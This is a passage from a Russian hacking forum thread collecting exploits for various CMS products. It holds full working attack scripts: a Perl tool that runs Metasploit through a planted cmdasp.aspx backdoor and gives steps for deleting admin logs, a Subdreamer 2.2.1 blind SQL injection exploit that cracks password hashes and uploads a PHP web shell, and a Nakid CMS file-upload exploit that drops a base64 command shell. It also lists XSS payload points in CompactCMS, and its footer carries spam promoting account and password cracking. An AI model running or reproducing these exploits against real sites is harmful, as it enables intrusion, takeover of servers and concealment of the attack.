		print "\e[1;34m$syscommand\e[0m\n";
		}
#Execute msfcli
print "Are you ready to execute msfcli? (Press Enter)\n";
print "msf > ";
$enter = <STDIN>;
chomp($enter);
print " Please Wait...";
print "[*] Executing the msfcli... [\e[1;32m DONE \e[0m]\n";

system("xterm -bg black -fg white -bd black -e ".$syscommand." &"); # If you don't have xterm, install IT!
sleep(30); # Sleep 30 seconds to fire up Metasploit Framework!

#Execute metasploit shell throught Web-Backdoor (cmdasp.aspx).
system('curl -k -L -b /tmp/cookies.txt -c /tmp/cookies.txt  -d __VIEWSTATE=%2FwEPDwULLTE2MjA0MDg4ODhkZKAYI%2BuShUtjaEQHez7lnHYtwecj -d txtArg="C:\Inetpub\EventSites\enterpriseitsecurity.gr\files\\'.$parameter.'" -d testing=excute -d __EVENTVALIDATION=%2FwEWAwLw6bCOCgKa%2B%2BKPCgKBwth5tWrCE%2BPx6jReXWdJAVRgAZWRoxo%3D  http://www.'.$site.'.gr/files/cmdasp.aspx');
}

print "# ******************************************************************************#\n";
print "# CAUTION 	CAUTION 	 CAUTION 	 CAUTION 	 CAUTION       *#\n";
print "# ******************************************************************************#\n";
print "# In Order to delete the logs go to  http://www.target.gr/files/cmdasp.aspx    *#\n";
print "# and execute the following command :                                          *#\n";
print "#									       *#\n";
print "# sqlcmd -S target_IP -U Database_User -P Database_Password -d Target_Database *#\n";
print "# -Q ''delete from cms_AdminLog where logRecDbTable='Your_Public_IP' '' -u     *#\n";
print "#									       *#\n";
print "# The Username and password for the Database can be found inside global.asa    *#\n";
print "# ******************************************************************************#\n";


# ***********#
# Quitting :D
# ***********#
sub quit
{
print "\e[1;31mExiting...Bye-Bye!\e[0m\n";
exit(1);
}
# ***************************************************************** #
Subdreamer CMS
Subdreamer 2.2.1 SQL Injection / Command Execution Exploit
Код:
#!/usr/bin/perl

## Subdreamer 2.2.1 command exec exploit
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
## supported targets:
##  ~ without forum integration
##  ~ with phpBB2 integration
##  ~ with ipb2 integration
##  ~ with vbulletin2 integration
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
## (c)oded by 1dt.w0lf - 19/09/2005
## RST/GHC
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

## work:
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
## r57subdreamer.pl -p http://subdreamer.com.ru/ -u 2 -t 1
## ------------------------------------------------------------------
## [~]   PATH : http://subdreamer.com.ru/
## [~]   USER : 2
## [~] TARGET : 1 - PhpBB2
## [1] STEP 1 : TRY GET USER PASSWORD
## [~] SEARCHING PASSWORD ... [ DONE ]
## -----------------------------------------------------------
##  USER_ID: 2
##     PASS: 26310e438a5a1fb8622738f1e5d34f8b
## -----------------------------------------------------------
## [2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE
## [+] DONE! THIS USER HAVE ACCESS!
## [3] STEP 3 : UPLOAD FILE
## [+] DONE! FILE "img.php" UPLOADED
## [+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)
## SUBDREAMER# id; uname -a; ls -la;
## ----------------------------------------------------------------
## uid=1003(apache) gid=1003(apache) groups=1003(apache)
## FreeBSD customer-3314.cit-network.net 5.3-RELEASE FreeBSD 5.3-RELEASE #0:
## Fri Nov  5 04:19:18 UTC 2004     root@harlow.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
## total 24
## drwxrwxrwx   5 enshteyn  apache  512 Sep 19 23:04 .
## drwxr-x---  10 enshteyn  apache  512 Sep 17 21:03 ..
## drwxr-xr-x   2 enshteyn  apache  512 Sep 10 14:09 Image
## -rw-r--r--   1 apache    apache   48 Sep 19 23:04 img.php
## drwxrwxrwx   2 enshteyn  apache  512 Sep 10 14:09 logos
## drwxrwxrwx   2 enshteyn  apache  512 Sep 10 14:09 smilies
## ----------------------------------------------------------------
## SUBDREAMER# exit
## @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

## config
## ------
##
## images folder
$img_folder = 'images';
## or try
##$img_folder = 'images/logos';
##
## end config

use LWP::UserAgent;
use HTTP::Cookies;
use Getopt::Std;

getopts('u:p:h:t:');

$path = $opt_p;
$user = $opt_u;
$hash = $opt_h;
$target = $opt_t || 0;

$s_num = 1;
$|++;
$n = 0;

@targets = (
#['target name','colimn1 in database','colimn2 in database','cookie name 1','cookie name 2']
 ['Subdreamer without forum','userid','password','sduserid','sdpassword'],
 ['PhpBB2','user_id','user_password','phpbb2mysql_data',''],
 ['IPB2','id','member_login_key','member_id','pass_hash'],
 ['PhpBB2 cookie injection','','','phpbb2mysql_data',''],
 ['IPB2 cookie injection','id','','member_id','pass_hash'],
 ['Vbulletin cookie injection','userid','','bbuserid','bbpassword'],
);

if (!$path || !$user || $target<0 || $target>5) { &usage; }
&head();
if($path=~/[^\/]$/) { $path .= '/'; }
print "[~]   PATH : $path\r\n";
print "[~]   USER : $user\r\n";
print "[~] TARGET : $target - $targets[$target][0]\r\n";
if($target==1||$target==2||$target==0) {
print "[1] STEP 1 : TRY GET USER PASSWORD\r\n";
if(!$hash){
print "[~] SEARCHING PASSWORD ... [|]";

FIND: while(1)
{
if(&found(47,58)==0) { &found(96,103); } 
$char = $i;
if ($char=="0") 
 { 
 if(length($allchar) > 0){
 print qq{\b\b DONE ] 
-----------------------------------------------------------
 USER_ID: $user
    PASS: $allchar
-----------------------------------------------------------
};
 last FIND;
 }
 else
 {
 print "\b\b FAILED ]";
 }
 exit(); 
 }
else 
 {  
 $allchar .= chr($char); 
 }
$s_num++;
}
}
else
{
print "[~] SKIP. HASH EXISTS\r\n"; 
$allchar = $hash;
}
}

print "[2] STEP 2 : CHECK WHAT USER HAVE ACCESS TO ADMIN ZONE\r\n";
if(&check_admin_rights())
 {
 print "[+] DONE! THIS USER HAVE ACCESS!\r\n"; 
 }
else
 {
 print "[-] DAMN! THIS USER NOT ADMIN =(\r\n"; 
 exit();
 }

print "[3] STEP 3 : UPLOAD FILE\r\n";
if(&upload_file())
 {
 print "[+] DONE! FILE \"img.php\" UPLOADED\r\n"; 
 }
else
 { 
 print "[-] DAMN! UPLOAD ERROR =(\r\n"; 
 exit();
 }
print "[+] WELL DONE! NOW YOU CAN EXECUTE COMMANDS! =)\r\n"; 

while ()
 {
    print "SUBDREAMER# ";
    while(<STDIN>)
     {
        $cmd=$_;
        chomp($cmd);
        exit() if ($cmd eq 'exit');
        last;
     }
    &run($cmd);
 }
 
sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
 
 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }
 
sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i<$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }
 
sub check($)
 {
 $n++;
 status();
 $ccheck = $_[0];
 $username = "no_such_user' OR (".$targets[$target][1]."=".$user." AND (ascii(substring(".$targets[$target][2].",".$s_num.",1))".$ccheck.")) /*";
  
 $xpl = LWP::UserAgent->new() or die;
 $res = $xpl->post($path.'index.php',
 {
 "loginusername" => $username,
 "loginpassword" => "nap0Jlb_Haxep",
 "login"         => "login",
 "Submit now"    => "Login"
 }
 ); 
 @results = $res->content; 
 
 foreach $result(@results)
  {
  if ($result =~ /(Database error)|(Invalid SQL)/i)
   {
   print "\r\n[-] SQL SYNTAX ERROR! CHECK TARGET!\r\n"; 
   exit();
   }
  #print $result;
  # english pattern
  if ($result =~ /Wrong Password/) { return 1; }
  # russian pattern
  if ($result =~ /...... ......./) { return 1; }
  # russian pattern 2
  if ($result =~ /............ ....../) { return 1; }
  # russian pattern 3 ( KOI8-R tested on subdreamer.com.ru )
  if ($result =~ /...... ......./) { return 1; }
  }
 return 0;
 }
 
sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]";  }
  if($status==1){ print "\b\b-]";  }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]";  }
}

sub check_admin_rights()
 {
 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new( );
 $xpl->cookie_jar( $cookie_jar );
 ($host = $path) =~ s!http://([^/]*).*!$1!;

if($target == 1)
  {
  # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ???
  #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,);
  # default phpbb2 cookie  
  $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);
  }
 elsif($target == 3)
  {
  # phpbb2 cookie with sql injection
  $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,);  
  }
 elsif($target == 4)
  {
  # ipb2 cookie with sql injection
  $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);  
  $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
  }
 elsif($target == 5)
  {
  # Vbulletin cookie with sql injection
  $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);  
  $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
  }
 else
  {
  # subdreamer || ipb2 cookies
  $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);
  $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);
  }
  
 $res = $xpl->get($path."admin/index.php");
 if($res->content =~ /loginpassword/) { return 0; }
 else { return 1; }
 }

sub upload_file()
 {
 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new( );
 $xpl->cookie_jar( $cookie_jar );
 ($host = $path) =~ s!http://([^/]*).*!$1!;
 
 if($target == 1)
  {
  # not default phpbb2 cookie, work for subdreamer.com.ru ... maybe default for subdreamer pro RU ???
  #$cookie_jar->set_cookie( "0",$targets[$target][3], 'autologinid='.$allchar.'|userid='.$user,"/",$host,,,,,);
  # default phpbb2 cookie
  $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22".$allchar."%22%3Bs%3A6%3A%22userid%22%3Bs%3A".length($user)."%3A%22".$user."%22%3B%7D","/",$host,,,,,);
  }
 elsif($target == 3)
  {
  # phpbb2 cookie with sql injection
  $cookie_jar->set_cookie( "0",$targets[$target][3],"a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A3%3A%22666%22%3Bs%3A6%3A%22userid%22%3Bs%3A".(length($user)+4)."%3A%22".$user."%27+%2F%2A%22%3B%7D","/",$host,,,,,);  
  }
 elsif($target == 4)
  {
  # ipb2 cookie with sql injection
  $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);  
  $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
  }
 elsif($target == 5)
  {
  # Vbulletin cookie with sql injection
  $cookie_jar->set_cookie( "0",$targets[$target][3],"666\\","/",$host,,,,,);  
  $cookie_jar->set_cookie( "1",$targets[$target][4],"/**/OR/**/".$targets[$target][2]."=".$user."","/",$host,,,,,);
  }
 else
  {
  # subdreamer || ipb2 cookies
  $cookie_jar->set_cookie( "0",$targets[$target][3], $user,"/",$host,,,,,);
  $cookie_jar->set_cookie( "1",$targets[$target][4], $allchar,"/",$host,,,,,);
  }
  
 $res = $xpl->post($path.'admin/imagemanager.php',Content_Type => 'form-data',
 Content => [
 'action'        => 'uploadimage',
 'folderpath'    => "../$img_folder/",
 'MAX_FILE_SIZE' => '1000000',
 'image'   => [ 
               undef,
               'img.php', 
               Content_type => 'text/plain',
               Content => '<? if($_POST[cmd]) { passthru($_POST[cmd]); } ?>', 
              ],
 'submit'        => 'Upload Image',
 ],
 );
 if($res->content =~ /Settings Updated/) { return 1; }
 if($res->content =~ /Uploading Errors/) { return 0; }
 else { return 1; }
 }

sub run()
 {
 $xpl = LWP::UserAgent->new() or die;
 $res = $xpl->post($path.$img_folder.'/img.php',{'cmd'=>$cmd}); 
 print "----------------------------------------------------------------\r\n";
 print $res->content;
 print "----------------------------------------------------------------\r\n";
 }

sub usage()
 {
 &head();
 print q(|                                                                    |
| - Usage:                                                           |
| r57subdreamer.pl -p <path> -u <user_id> [-t <target>] [-h <hash>]  |
|     <path>    - Path to subdreamer folder                          |
|     <user_id> - User id for bruteforce                             |
|     <hash>    - MD5 password hash for this user if you have it =\)  |
| - Available targets:                                               |
|          - brute password:                                         |
|               0 - Subdreamer without forum integration ( default ) |
|               1 - Subdreamer with PhpBB2 integration               |
|               2 - Subdreamer with IPB2 integration                 |
|          - cookie sql injection, dont need brute password:         |
|               3 - Subdreamer with PhpBB2 integration 2             |
|               4 - Subdreamer with IPB2 integration 2               |
|               5 - Subdreamer with Vbulletin integration            |
+--------------------------------------------------------------------+
| e.g.:                                                              |
| r57subdreamer.pl -p http://127.0.0.1/subdreamer/ -u 1              |
| r57subdreamer.pl -p http://www.subdreamer.com.ru -u 2 -t 1         | 
+--------------------------------------------------------------------+
 );
 exit();
 }

sub head()
 {
 print q(
+--------------------------------------------------------------------+
| Subdreamer version 2.2.1 sql injection + command execution exploit |
|                          by 1dt.w0lf                               |
|                            RST/GHC                                 |
+--------------------------------------------------------------------+
);}
Nakid CMS
Nakid CMS 0.5.2 Remote Include Exploit
Код:
http://[victim]/modules/catalog/upload_photo.php?core[system_path]=[evil script]
Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit
Код:
<?php
/*
 -----------------------------------------------------------------
 Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit
 -----------------------------------------------------------------

 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0     _                   __           __       __                     1
 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
 1                  \ \____/ >> Exploit database separated by exploit   0
 0                   \/___/          type (local, remote, DoS, etc.)    1
 1                                                                      1
 0  [+] Site            : Inj3ct0r.com                                  0
 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
 0                                                                      0
 1                    ########################################          1
 0                    I'm eidelweiss member from Inj3ct0r Team          1
 1                    ########################################          0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

 Developers: www.nakid.org
 Download : https://sourceforge.net/projects/nakidcms/files/Nakid%20CMS%20v_0_5_2.rar/download
 Version:   0.5.2
 exploited by ..: eidelweiss
 
 details..: works with an Apache server with the mod_mime module installed (if specific)
  
 [-] vulnerable code in path/includes/js/fckeditor/editor/filemanager/connectors/php/config.php[*] // SECURITY: You must explicitly enable this "connector". (Set it to "true").[*][*]	$Config['Enabled'] = true ;[*][*] // Path to user files relative to the document root.[*] $Config['UserFilesPath'] = '/nakid_uploads/' ;[*] //$Config['UserFilesPath'] = '/userfiles/' ;[*][*] // Fill the following value it you prefer to specify the absolute path for the[*] // user files directory. Usefull if you are using a virtual directory, symbolic[*] // link or alias. Examples: 'C:\\MySite\\UserFiles\\' or '/root/mysite/UserFiles/'.[*] // Attention: The above 'UserFilesPath' must point to the same directory.[*][*] // What the user can do with this connector.[*] $Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;[*][*] $Config['AllowedExtensions']['File']	= array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', [....][*] $Config['DeniedExtensions']['File']     = array() ;[*][*] $Config['AllowedExtensions']['Image']   = array('bmp','gif','jpeg','jpg','png') ;[*] $Config['DeniedExtensions']['Image']    = array() ;[*][*] $Config['AllowedExtensions']['Flash']   = array('swf','flv') ;[*] $Config['DeniedExtensions']['Flash']    = array() ;[*][*] $Config['AllowedExtensions']['Media']	= array('aiff', 'asf', 'avi', 'bmp', 'fla', 'flv', 'gif', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'png', 'qt', 'ram', 'rm', 'rmi', 'rmvb', 'swf', 'tif', 'tiff', 'wav', 'wma', 'wmv') ;[*] $Config['DeniedExtensions']['Media']    = array() ;
     
    with a default configuration of this script, an attacker might be able to upload arbitrary
    files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
 
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
 $sock = fsockopen($host, 80);
 while (!$sock)
 {
  print "\n[-] No response from {$host}:80 Trying again...";
  $sock = fsockopen($host, 80);
 }
 fputs($sock, $packet);
 while (!feof($sock)) $resp .= fread($sock, 1024);
 fclose($sock);
 return $resp;
}
function upload()
{
 global $host, $path;
  
 $connector = "/includes/js/fckeditor/editor/filemanager/connectors/php/config.php";
 $file_ext  = array("zip", "jpg", "fla", "doc", "xls", "rtf", "csv");
  
 foreach ($file_ext as $ext)
 {
  print "\n[-] Trying to upload with .{$ext} extension...";
   
  $data  = "--abcdef\r\n";
  $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"0k.php.{$ext}\"\r\n";
  $data .= "Content-Type: application/octet-stream\r\n\r\n";
  $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
  $data .= "--abcdef--\r\n";
   
  $packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
  $packet .= "Host: {$host}\r\n";
  $packet .= "Content-Length: ".strlen($data)."\r\n";
  $packet .= "Content-Type: multipart/form-data; boundary=abcdef\r\n";
  $packet .= "Connection: close\r\n\r\n";
  $packet .= $data;
   
  preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
   
  if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
   
  $packet  = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
  $packet .= "Host: {$host}\r\n";
  $packet .= "Connection: close\r\n\r\n";
  $html    = http_send($host, $packet);
   
  if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
   
  sleep(1);
 }
  
 return false;
}
print "\n+--------------------------------------------------------------------------+";
print "\n| Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit by eidelweiss |";
print "\n+--------------------------------------------------------------------------+\n";
if ($argc < 3)
{
 print "\nUsage......: php $argv[0] host path\n";
 print "\nExample....: php $argv[0] localhost /";
 print "\nExample....: php $argv[0] localhost /Nakid/\n";
 die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed You are not lucky...\n");
else print "\n[-] Shell uploaded in progress...!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
 print "\Nakid-shell# ";
 $cmd = trim(fgets(STDIN));
 if ($cmd != "exit")
 {
  $packet = "GET {$path}0k.php.{$ext} HTTP/1.0\r\n";
  $packet.= "Host: {$host}\r\n";
  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
  $packet.= "Connection: close\r\n\r\n";
  $html   = http_send($host, $packet);
  if (!eregi("_code_", $html)) die("\n[-] Exploit failed You are not lucky...\n");
  $shell = explode("_code_", $html);
  print "\n{$shell[1]}";
 }
 else break;
}
?>
  Ответить с цитированием
Ответ: Уязвимости различных CMS
Старый 26.01.2011, 11:22   #2
Cordinal
RAM 16MB
 
Аватар для Cordinal
 
Регистрация: 03.01.2010
Сообщений: 25
Cordinal на пути к лучшему
Cordinal вне форума
По умолчанию Ответ: Уязвимости различных CMS

CompactCMS 1.4.1 Multiple Vulnerabilities
PHP код:
# Exploit Title: CompactCMS 1.4.1 Multiple Vulnerabilities
# Google Dork:   intext:"Maintained with CompactCMS.nl" intitle:"Print: *"
# Date:          17-12-2010
# Author:        NLSecurity
# Software Link: http://files.compactcms.nl/stable/
# Version:       CompactCMS 1.4.1
# Credits:       http://www.nlsecurity.org/
# Extra:         irc.6667.eu  #main
 
Description:
 
CompactCMS 1.4.1 has multiple XSS and File Disclosure vulnerabilities. These file disclosures will
appear if the users have access to view open directories.
 
--- File Disclosures ---
 
/admin/includes/modules/backup-restore/
/admin/includes/modules/backup-restore/content-owners/
/admin/includes/modules/backup-restore/module-management/
/admin/includes/modules/backup-restore/permissions/
/admin/includes/modules/backup-restore/template-editor/
/admin/includes/modules/backup-restore/user-management/
 
/admin/includes/fancyupload/
/admin/includes/fancyupload/Assets/
/admin/includes/fancyupload/Assets/Icons/
 
/admin/includes/fancyupload/Backend/
/admin/includes/fancyupload/Backend/Assets/
/admin/includes/fancyupload/Backend/Assets/getid3/
 
/admin/includes/fancyupload/Language/
/admin/includes/fancyupload/Source/
/admin/includes/fancyupload/Source/Uploader/
 
/admin/includes/edit_area/
/admin/includes/edit_area/images/
/admin/includes/edit_area/langs/
/admin/includes/edit_area/reg_syntax/
 
/admin/img/mochaui/
/admin/img/styles/
/admin/img/uploader/
 
/_docs/
 
... Perhaps more, but this should give an idea. :-)
 
--- Cross-Site Scripting Vulnerabilities (XSS) ---
 
/afdrukken.php?page=">[XSS]
 
This can be found on line 48:
<strong><a href="<?php echo $ccms['rootdir'];?><?php echo ($_GET['page']!=$cfg['homepage'])?$_GET['page'].'.html':null?>"><?php echo $ccms['lang']['system']['tooriginal']; ?></a></strong>
Vuln: $_GET['page']
 
---
 
/admin/includes/modules/permissions/permissions.Manage.php?status=notice&msg=[XSS]
 
This can be found on line 62:
<?php if(isset($_GET['msg'])) { echo '<span class="ss_sprite ss_confirm">'.$_GET['msg'].'</span>'; } ?>
Vuln: $_GET['msg']
 
---
 
/lib/includes/auth.inc.php
Username input field (userName) has an XSS vulnerability when using POST data.
 
This can be found on line 119:
<label for="userName"><?php echo $ccms['lang']['login']['username']; ?></label><input type="text" class="alt title" autofocus placeholder="username" name="userName" style="width:300px;" value="<?php echo (!empty($_POST['userName'])?$_POST['userName']:null);?>" id="userName" />
Vuln: $_POST['userName']
  Ответить с цитированием
Ответ: Уязвимости различных CMS
Старый 11.04.2011, 02:03   #3
denwers
RAM 32MB
 
Аватар для denwers
 
Регистрация: 11.03.2011
Сообщений: 47
denwers Новичок
denwers вне форума
По умолчанию Ответ: Уязвимости различных CMS

что значит уязвимость? что она дает?
__________________
:russian:
  Ответить с цитированием
Ответ: Уязвимости различных CMS
Старый 11.04.2011, 02:41   #4
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Ответ: Уязвимости различных CMS

Цитата:
Сообщение от denwers Посмотреть сообщение
что значит уязвимость? что она дает?
Много чего, повышение прав, и т д, мускл иньекцию.
В этой раскрытие путей и еще чтото.
  Ответить с цитированием
Ответ: Уязвимости различных CMS
Старый 17.04.2011, 00:27   #5
denwers
RAM 32MB
 
Аватар для denwers
 
Регистрация: 11.03.2011
Сообщений: 47
denwers Новичок
denwers вне форума
По умолчанию Ответ: Уязвимости различных CMS

все норм, только знать бы еще как это использовать, эт не для меня значит, как эти уязвимости находят?
__________________
:russian:
  Ответить с цитированием
Ответ: Уязвимости различных CMS
Старый 17.04.2011, 09:29   #6
Fooog
«¤†‡°°‡†¤
 
Аватар для Fooog
 
Регистрация: 27.01.2011
Сообщений: 574
Fooog как роза среди колючекFooog как роза среди колючекFooog как роза среди колючекFooog как роза среди колючек
Fooog вне форума
По умолчанию Ответ: Уязвимости различных CMS

Цитата:
как эти уязвимости находят?
Поставь себе движок на котором хочешь найти уязвимость, и начинай на нем искать баги.
А вообще для начала почитай что такое сплоиты, SQL-inj и хотя бы банально что такое xss.
__________________
Настоятельно рекомендуем при сделках использовать гарант-сервис.
  Ответить с цитированием
Ответ: Уязвимости различных CMS
Старый 18.04.2011, 21:11   #7
denwers
RAM 32MB
 
Аватар для denwers
 
Регистрация: 11.03.2011
Сообщений: 47
denwers Новичок
denwers вне форума
По умолчанию Ответ: Уязвимости различных CMS

ну я примерно понял, я вот на своем сайте проверил, и нашел уязвимости через xpider 7.7, нашел переполнение буфера, и sql инъекцию, как исправить это?

Добавлено через 4 минуты 31 секунду
я в инете пошарил там даже примеры как ломать есть,права давать...,только куда весь тот текст вводить чтобы эти изменения работали если я зайду на свой сайт как гость?
__________________
:russian:
  Ответить с цитированием
Последний раз редактировалось denwers; 18.04.2011 в 21:11. Причина: Добавлено сообщение
Ответ: Уязвимости различных CMS
Старый 19.04.2011, 13:54   #8
Spam
RAM 256MB
 
Аватар для Spam
 
Регистрация: 22.07.2009
Сообщений: 391
Spam - это имя известно всемSpam - это имя известно всемSpam - это имя известно всемSpam - это имя известно всемSpam - это имя известно всемSpam - это имя известно всем
Spam вне форума
По умолчанию Ответ: Уязвимости различных CMS

язык запрос sql знаком?
__________________
Хакер — не преступник. Взлом для искусства. Смысл — в свободе.
  Ответить с цитированием
Ответ: Уязвимости различных CMS
Старый 19.04.2011, 17:13   #9
andersen62
RAM 96MB
 
Аватар для andersen62
 
Регистрация: 17.03.2011
Сообщений: 125
andersen62 на пути к лучшему
andersen62 вне форума
По умолчанию Ответ: Уязвимости различных CMS

может у кого-то завалялись под joomla иньекции?
  Ответить с цитированием
Ответ: Уязвимости различных CMS
Старый 19.04.2011, 18:06   #10
mironich
RAM 256MB
 
Аватар для mironich
 
Регистрация: 22.11.2010
Сообщений: 2,026
mironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личностьmironich - просто великолепная личность
mironich вне форума
По умолчанию Ответ: Уязвимости различных CMS

Цитата:
Сообщение от andersen62 Посмотреть сообщение
может у кого-то завалялись под joomla иньекции?
Гугл в руки и вперед, [Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot